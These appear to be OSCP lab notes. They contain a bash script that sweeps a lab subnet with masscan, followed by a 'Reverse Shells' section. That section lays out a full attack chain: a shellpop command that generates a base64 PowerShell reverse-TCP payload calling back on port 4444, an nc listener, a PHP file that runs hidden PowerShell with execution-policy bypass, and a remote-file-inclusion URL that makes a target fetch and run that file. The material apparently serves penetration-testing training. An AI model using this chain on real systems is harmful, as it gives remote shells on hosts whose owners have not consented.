OSCP
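# Discovery
## masscan
### Top 100 ports TCP/UDP
#
# Sweep the lab subnet for a fixed TCP/UDP port list (the TCP half roughly
# matches nmap's top 100; the UDP half is considerably longer) and derive a
# "HOST PORT/PROTO" list from the result.
# Needs root (or CAP_NET_RAW): masscan sends raw packets on the VPN interface.
#
# The raw masscan output is kept untouched as the scan record; the summary is
# computed from it rather than rewriting it in place (the old sed -i), so the
# post-processing can be re-run or adjusted without losing the original findings.
#
# Usage: TARGET=10.11.1.0/24 IFACE=tun0 ROUTER_IP=10.11.0.1 RATE=1000 bash discover.sh
set -euo pipefail

readonly TARGET=${TARGET:-10.11.1.0/24}
readonly IFACE=${IFACE:-tun0}
# Next hop for the scan. Presumably required because tun0 is a point-to-point
# interface with no ARP-able gateway for masscan to discover — TODO confirm
# against masscan --help for the installed version.
readonly ROUTER_IP=${ROUTER_IP:-10.11.0.1}
# Packets per second. 1000 is deliberately gentle for a VPN lab; higher rates
# tend to lose responses over the tunnel rather than finish faster.
readonly RATE=${RATE:-1000}
readonly RAW_OUT=masscan_top100_entire_subnet_tcp_udp.txt
readonly FINAL_OUT=final_lab_open_ports_tcp_udp.txt
# masscan port syntax: bare numbers/ranges are TCP, "U:" prefixes UDP.
readonly PORTS='7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157,U:2-3,U:7,U:9,U:13,U:17,U:19-23,U:37-38,U:42,U:49,U:53,U:67-69,U:80,U:88,U:111-113,U:120,U:123,U:135-139,U:158,U:161-162,U:177,U:192,U:199,U:207,U:217,U:363,U:389,U:402,U:407,U:427,U:434,U:443,U:445,U:464,U:497,U:500,U:502,U:512-515,U:517-518,U:520,U:539,U:559,U:593,U:623,U:626,U:631,U:639,U:643,U:657,U:664,U:682-689,U:764,U:767,U:772-776,U:780-782,U:786,U:789,U:800,U:814,U:826,U:829,U:838,U:902-903,U:944,U:959,U:965,U:983,U:989-990,U:996-1001,U:1007-1008,U:1012-1014,U:1019-1051,U:1053-1060,U:1064-1070,U:1072,U:1080-1081,U:1087-1088,U:1090,U:1100-1101,U:1105,U:1124,U:1200,U:1214,U:1234,U:1346,U:1419,U:1433-1434,U:1455,U:1457,U:1484-1485,U:1524,U:1645-1646,U:1701,U:1718-1719,U:1761,U:1782,U:1804,U:1812-1813,U:1885-1886,U:1900-1901,U:1993,U:2000,U:2002,U:2048-2049,U:2051,U:2148,U:2160-2161,U:2222-2223,U:2343,U:2345,U:2362,U:2967,U:3052,U:3130,U:3283,U:3296,U:3343,U:3389,U:3401,U:3456-3457,U:3659,U:3664,U:3702-3703,U:4000,U:4008,U:4045,U:4444,U:4500,U:4666,U:4672,U:5000-5003,U:5010,U:5050,U:5060,U:5093,U:5351,U:5353,U:5355,U:5500,U:5555,U:5632,U:6000-6002,U:6004,U:6050,U:6346-6347,U:6970-6971,U:7000,U:7938,U:8000-8001,U:8010,U:8181,U:8193,U:8900,U:9000-9001,U:9020,U:9103,U:9199-9200,U:9370,U:9876-9877,U:9950'

die() { printf '%s\n' "$*" >&2; exit 1; }

#######################################
# Normalise masscan's stdout into "HOST PORT/PROTO" lines.
# Only "Discovered open port PORT/PROTO on HOST" lines are findings; anything
# else masscan may print to stdout (e.g. banner lines) is skipped instead of
# being passed through as garbage.  If you would rather not depend on the
# human-readable text, masscan's -oL list format is the stable alternative.
# Arguments: $1 - raw masscan output file
# Outputs:   one line per open port on stdout, sorted by address then port
#            (GNU sort -V orders the dotted address and the port numerically)
#######################################
summarize_masscan() {
  local raw=$1
  # grep exits 1 on "no matches", which is a valid empty scan, not an error;
  # exit 2 (real failure) still fails the pipeline under pipefail.
  { grep '^Discovered open port ' -- "$raw" || [[ $? -eq 1 ]]; } \
    | awk '{ print $6, $4 }' \
    | LC_ALL=C sort -V
}

main() {
  command -v masscan >/dev/null || die "masscan not found in PATH"
  # Findings go to stdout and are captured; masscan's progress/status output
  # stays on stderr so the raw file holds only results.
  masscan -p"$PORTS" "$TARGET" --rate="$RATE" -e "$IFACE" --router-ip "$ROUTER_IP" > "$RAW_OUT"
  summarize_masscan "$RAW_OUT" > "$FINAL_OUT"
}

main "$@"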
# Shells
## Reverse Shells
### Windows Reverse Shell Howto
# Generate Payload
# shellpop emits a base64-encoded PowerShell reverse-TCP one-liner that calls
# back to this box's tun0 address on 4444 and serves the stager over HTTP.
# NOTE(review): --handler looks like it also makes shellpop start its own
# listener on the same port — confirm; if so, use either that or the nc below,
# not both, or the second bind fails.
shellpop --payload windows/reverse/tcp/powershell --host tun0 --port 4444 --base64 --stager http --handler
# run listener (attacking machine)
# Unencrypted shell. nc listens on all interfaces by default, so anything that
# can reach port 4444 on this host — not only the lab VPN — can connect to it.
nc -lvnp 4444
# Host the include file on the attacking machine's web server. The PHP below is
# executed by the vulnerable target when it includes the URL, not by our own
# server, so serve it under a name PHP will not parse locally (hence test.txt, not .php).
[root@kali:/var/www/html]# cat test.txt | |
<?php echo Shell_Exec ('powershell.exe -nop -w hidden -ep bypass -Encoded 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'); ?> | |
# Perform the RFI attack (attacking machine)
# Only works if the target's PHP permits remote includes (allow_url_include=On,
# which is off by default). The include — and therefore the PowerShell callback —
# runs as the target's web server user.
Browse to http://192.168.152.10/menu.php?file=http://192.168.119.152/test.txt